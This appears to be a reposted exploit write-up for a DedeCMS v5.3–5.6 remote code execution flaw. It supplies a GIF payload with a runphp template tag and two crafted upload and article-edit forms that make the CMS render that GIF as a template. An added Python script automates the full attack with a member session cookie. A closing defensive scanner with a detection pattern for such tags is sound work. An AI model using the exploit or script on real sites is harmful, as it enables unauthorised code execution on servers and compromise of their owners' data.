DedeCMS v5.3-v5.6 Get Shell 0day exploit analysis - exploit warning - the black bar safety net

2010-09-18T00:00:00
ID MYHACK58:62201027891
Type myhack58
Reporter Anonymous (佚名)
Modified 2010-09-18T00:00:00

Description

Author: toby57   Team: www.wolvez.org

This 0day has been around for quite a while. Today I went through the code with the help of a log provided by a fellow member ("dragons") and worked out the cause of the vulnerability. Since most people are not interested in the root cause, only the exploitation method is published here.

Save the following as 1.gif (an image header followed by a DedeCMS template tag whose runphp='yes' causes the template engine to execute the PHP between the tags):

Gif89a{dede:field name='toby57' runphp='yes'} phpinfo(); {/dede:field}

Construct the upload-edit form below. The oldurl field names an existing member upload that the new file replaces:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
  <input type="hidden" name="aid" value="7" />
  <input type="hidden" name="mediatype" value="1" />
  <input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
  <input type="hidden" name="dopost" value="save" />
  <input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
  <input name="addonfile" type="file" id="addonfile"/>
  <button class="button2" type="submit">change</button>
</form>

Submit the form with 1.gif as addonfile; after the upload the image is saved as /uploads/userup/3/1.gif.

Publish an article, then construct the modified article-edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
  <input type="hidden" name="dopost" value="save" />
  <input type="hidden" name="aid" value="2" />
  <input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
  <input type="hidden" name="channelid" value="1" />
  <input type="hidden" name="oldlitpic" value="" />
  <input type="hidden" name="sortrank" value="1282049150" />
  <input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
  <input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
  <select name='typeid' size='1'>
    <option value='1' class='option3' selected>Test</option>
  </select>
  <select name='mtypesid' size='1'>
    <option value='0'>please select a category...</option>
    <option value='1' class='option3' selected>aa</option>
  </select>
  <textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
  <input type='hidden' name='dede_addonfields' value="templet">
  <input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
  <input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
  <button class="button2" type="submit">submit</button>
</form>

The two hidden fields dede_addonfields and templet are the essential part: they make article_edit.php save templet as an add-on field holding the path of the uploaded GIF, so the article is rendered with the GIF as its template and the {dede:field runphp='yes'} tag inside it is executed.

The parts marked in red in the original post (the values that depend on the target installation, such as the host, aid, idhash and file paths) must be changed to match the actual situation. Once the changes are made, view the article: rendering it through the GIF template executes the phpinfo() in the payload.
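The whole procedure as one script, added here as an example and not code from the original write-up: the two multipart POSTs above and the final article view, built with the Python standard library so the request bodies can be inspected offline. The host, the aid and idhash values, the member session cookie and the article view URL are placeholders (the view URL is an assumption; use whatever URL the published article actually has).

```python
"""Added example, not the original write-up's code: the two multipart POSTs
from the procedure above plus the final article view, built with the
standard library. Host, paths, aid, idhash, the article's view URL and the
member session cookie are placeholders to adapt to the target."""
import uuid
import urllib.request
from typing import Dict, Optional, Tuple

# Payload from the write-up: an image header followed by a DedeCMS template
# tag whose runphp='yes' makes the template engine run the PHP inside it.
PAYLOAD_GIF = (b"Gif89a{dede:field name='toby57' runphp='yes'} "
               b"phpinfo(); {/dede:field}")


def encode_multipart(fields: Dict[str, str],
                     files: Dict[str, Tuple[str, bytes]],
                     boundary: Optional[str] = None) -> Tuple[bytes, str]:
    """Encode text fields and file parts as a multipart/form-data body.

    Returns (body, Content-Type header value). The values used here are
    ASCII; the target build is GBK, so non-ASCII text is encoded as GBK.
    """
    boundary = boundary or uuid.uuid4().hex
    sep = b"--" + boundary.encode()
    parts = []
    for name, value in fields.items():
        parts += [sep,
                  f'Content-Disposition: form-data; name="{name}"'.encode(),
                  b"", value.encode("gbk")]
    for name, (filename, data) in files.items():
        parts += [sep,
                  (f'Content-Disposition: form-data; name="{name}"; '
                   f'filename="{filename}"').encode(),
                  b"Content-Type: image/gif", b"", data]
    parts += [sep + b"--", b""]
    return b"\r\n".join(parts), f"multipart/form-data; boundary={boundary}"


def upload_edit_fields(aid: int, oldurl: str) -> Dict[str, str]:
    """First form: replace the existing member upload at oldurl (record aid)."""
    return {"aid": str(aid), "mediatype": "1", "oldurl": oldurl,
            "dopost": "save", "title": "1.jpg"}


def article_edit_fields(aid: int, idhash: str, templet: str) -> Dict[str, str]:
    """Second form: dede_addonfields/templet point the article's template at
    the uploaded GIF; the remaining values are the write-up's filler."""
    return {"dopost": "save", "aid": str(aid), "idhash": idhash,
            "channelid": "1", "oldlitpic": "", "sortrank": "1282049150",
            "title": "aaaaaaaaaaaaaaa", "writer": "123456",
            "typeid": "1", "mtypesid": "1", "description": "aaaaaaaaaaaaa",
            "dede_addonfields": "templet", "templet": templet, "body": "aaaa"}


def post_form(url: str, fields: Dict[str, str],
              files: Dict[str, Tuple[str, bytes]], cookie: str) -> bytes:
    """Send one multipart POST carrying the logged-in member's cookie."""
    body, content_type = encode_multipart(fields, files)
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": content_type,
                                          "Cookie": cookie})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read()


def run(base: str, cookie: str, upload_aid: int, oldurl: str,
        article_aid: int, idhash: str, templet: str, view_url: str) -> bytes:
    """The write-up's steps in order; returns the rendered article page."""
    post_form(base + "/member/uploads_edit.php",
              upload_edit_fields(upload_aid, oldurl),
              {"addonfile": ("1.gif", PAYLOAD_GIF)}, cookie)
    post_form(base + "/member/article_edit.php",
              article_edit_fields(article_aid, idhash, templet), {}, cookie)
    # Viewing the article renders it through its template, i.e. the payload GIF.
    req = urllib.request.Request(view_url, headers={"Cookie": cookie})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read()


if __name__ == "__main__":
    # Placeholder values; only the paths and ids come from the write-up, the
    # cookie and the view URL are assumptions to replace for a real target.
    page = run("http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads",
               "PHPSESSID=replace-with-member-session",
               7, "/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif",
               2, "ec66030e619328a6c5115b55483e8dbd",
               "../uploads/userup/3/1.gif",
               "http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/plus/view.php?aid=2")
    print("phpinfo rendered:", b"PHP Version" in page)
```

The member-area scripts require a logged-in member session, which the write-up takes for granted; the cookie argument is where that session goes. The encoder is kept separate from the field builders so the exact bytes sent can be checked before anything leaves the host.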
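The check a defender would want after reading the above, added here as an example that is not part of the original write-up: scan a member upload directory for "images" that carry a {dede:...} tag with runphp enabled or a raw PHP open tag after the header. The sample files and the directory layout (userup/3/) are constructed for the demo; note that the write-up's payload starts with "Gif89a", not the real "GIF89a" signature, so the scanner reports the header separately from the embedded tags rather than relying on the magic bytes alone.

```python
"""Added example, not code from the original write-up: flag uploaded image
files that contain a DedeCMS template tag with runphp enabled or a PHP open
tag. Sample files below are constructed for the demo."""
import os
import re
import tempfile
from typing import List, Tuple

IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")

# A {dede:...} tag that enables runphp, or a PHP open tag, inside an "image".
SUSPICIOUS = re.compile(
    rb"\{dede:\w+[^}]*runphp\s*=\s*[\"']?yes|<\?php|<\?=", re.IGNORECASE)

# Constructed samples: the write-up's payload shape, and a benign 1x1 GIF.
PAYLOAD_SAMPLE = (b"Gif89a{dede:field name='x' runphp='yes'} "
                  b"phpinfo(); {/dede:field}")
BENIGN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
              b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00"
              b"\x00\x02\x02D\x01\x00;")


def inspect_image(data: bytes) -> List[str]:
    """Return findings for one file's bytes; an empty list means clean."""
    findings = []
    if not data.startswith(IMAGE_MAGIC):   # case-sensitive, so 'Gif89a' fails
        findings.append("header is not a known image signature")
    for m in SUSPICIOUS.finditer(data):
        findings.append(f"template/PHP tag at offset {m.start()}: "
                        f"{m.group(0)[:40]!r}")
    return findings


def scan_dir(root: str) -> List[Tuple[str, List[str]]]:
    """Walk root and return (path, findings) for every suspicious image file."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith((".gif", ".jpg", ".jpeg", ".png")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                findings = inspect_image(fh.read())
            if findings:
                hits.append((path, findings))
    return hits


def demo() -> int:
    """Build a throwaway userup/3/ directory with both samples; return hit count."""
    with tempfile.TemporaryDirectory() as root:
        userup = os.path.join(root, "userup", "3")
        os.makedirs(userup)
        with open(os.path.join(userup, "1.gif"), "wb") as fh:
            fh.write(PAYLOAD_SAMPLE)
        with open(os.path.join(userup, "ok.gif"), "wb") as fh:
            fh.write(BENIGN_GIF)
        hits = scan_dir(root)
        for path, findings in hits:
            print(path, findings)
        return len(hits)


if __name__ == "__main__":
    demo()
```

Run it against the real uploads/userup tree instead of the temporary directory to triage an installation; a file that passes the header check but still matches the tag pattern is exactly the case a magic-bytes-only upload filter lets through.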